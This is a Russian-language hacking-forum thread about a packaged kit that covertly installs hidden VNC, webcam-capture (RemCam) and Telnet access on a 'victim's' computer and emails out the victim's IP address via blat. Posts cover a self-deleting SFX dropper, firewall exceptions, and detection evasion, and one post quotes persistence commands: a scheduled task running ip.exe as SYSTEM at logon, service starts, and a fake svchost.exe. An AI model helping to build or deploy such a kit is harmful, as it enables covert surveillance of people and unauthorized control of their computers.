1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Скрытый VNC + RemCam + Telnet + IP на мыло

Тема в разделе "Вирусы|:|Крипторы|:|Джоинеры", создана пользователем onthar, 2 дек 2010.

  1. SkyDArh
    SkyDArh Новичок
    Симпатии:
    0
    > природе бэкконнект для vnc существует

    Пробывал поискать, что то ничего найти не могу, подскажи по каким словм искать

    BackConnect VNC ?
     
    11 сен 2011
  2. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    11 сен 2011
  3. rotvellerr
    rotvellerr Новичок
    Симпатии:
    0
    А для remcam2 бэкконнект можно припаять?
     
    12 окт 2011
  4. lognarki
    lognarki Guest
    Вопрос ТС - а что за плагин для Total Commander, который позволяет в архив назад ip.exe запихнуть? А то уже почти все плагины и архиваторы перепробовал с нулевым результатом =(
     
    15 окт 2011
  5. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    плагин для работы с архивами 7z, rar.
    Точнее не скажу - плагинов стоит много, какой именно отвечает в данном случае за работу с архивами - непонятно.
     
    15 окт 2011
  6. Dr. W@tson
    Dr. W@tson Новичок
    Симпатии:
    2
    Ну это понятно ... Большой обьем данных передается .... Хочешь , что бы не тормозило - увеличивай скорость интернета (и пинг соответственно) .... Подругому никак ... (((
     
    28 ноя 2011
  7. sem66670
    sem66670 Новичок
    Симпатии:
    0
    качается ехе файл(Binary File (1,6 МБ))...а где архив???
     
    Последнее редактирование: 1 дек 2011
    30 ноя 2011
  8. TDI
    TDI Новичок
    Симпатии:
    38
    это SFX архив
     
    6 дек 2011
  9. slayder
    slayder Новичок
    Симпатии:
    0
    запустил на своём компе, за собой файл удалился, потом вылизло 3 сообщения с обращением к blat нажал везде ОК. Но на ящик который указывал нечего не пришло..
     
    19 янв 2012
  10. edonkey
    edonkey Новичок
    Симпатии:
    0
    у тебя случайно не ошибка оного блат вылазила? если да - то попробуй скачай последний blat с офф сайта и переделай все с что к нему относиться с самого начала с новыми файлами от blat
     
    19 янв 2012
  11. slayder
    slayder Новичок
    Симпатии:
    0
    да, только как и где скачать blat я незнаю)
     
    23 янв 2012
  12. TDI
    TDI Новичок
    Симпатии:
    38
    blat
     
    23 янв 2012
  13. slayder
    slayder Новичок
    Симпатии:
    0
    спасибо, но уже ещё вопрос назрел) Скинь мануал по эти файлам или скажи в каком месте меняется емаил. Я не пойму на какую именно почту пойдёт отправка
     
    30 янв 2012
  14. TDI
    TDI Новичок
    Симпатии:
    38
    вроде в батнике, не помню точно где
     
    31 янв 2012
  15. FlatL1ne
    FlatL1ne Новичок
    Симпатии:
    0
    Можно перезалить?
     
    12 фев 2012
  16. cybertatar
    cybertatar Новичок
    Симпатии:
    0
    Много уже времени утекло после заливки этого чуда... Но решил задать несколько вопросов, т.к. хочу разобраться с принципом построения для своей сборки с новой UltraVNC.

    1) Как я порнял, после запуска install.exe на компе жертвы выполняется start.js, который вызывает install.cmd и самоудаляется. А нельзя как нибудь сразу вызывать install.cmd без js? И при создании своего SFX-архива через 7zip можно ли указывать что выполнять после распаковки?

    2) Почему файлы копируются не только в System32, а еще и в SysWOW64? Ведь в 64-битных ОС должен работать и без этого?

    3) За установку UltraVNC и выставление атрибутов, как я понял, отвечают только строки 5-9, 18-22. Я прав? А можете написать, за какие именно проги отвечают остальные (ну ip.exe понятно, а вот telnet и remcam - не совсем).

    4) А из строк 30-40 что за что отвечает? Просто в реестрах я полный ***.

    5) Ну с добавлением исключении для файрвола немного понятно, хоть и не понимаю принципа. Разберусь, наверно, сам. Строки 51-53 - Telnet, 55-57 - RemCam?

    6) Эта строка за что отвечает?
    schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/ip.exe
    А эти:
    net start Telnet
    net start "Service Host Controller"
    net start Schedule

    И как на самом деле должны быть поставлены слэши?
    start %SYSTEMROOT%/System32\svсhost.exe
     
    10 мар 2012
  17. Coolfreeze
    Coolfreeze Новичок
    Симпатии:
    0
    Если машина жертвы находится за NAT-ом, сборка актуальна? палится ли она чем нибудь? и как жертва может понять что он не один хозяин компа?
     
    15 май 2012
  18. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    1) нет
    2) на данный момент всем чем можно
    3) жертва не ламер всегда имеет утилиты, такие как anvir, чего уже достаточно, не говоря уж об остальных факторах
     
    15 май 2012
  19. Uper
    Uper Новичок
    Симпатии:
    0
    Ошибки

    подскажите как это исправить
     

    Вложения:

    28 дек 2012
  20. hayArman
    hayArman Новичок
    Симпатии:
    1
    Не C:\Windows/ip.exe ,а C:\windows\ip.exe*xD*
     
    29 дек 2012

Поделиться этой страницей

Загрузка...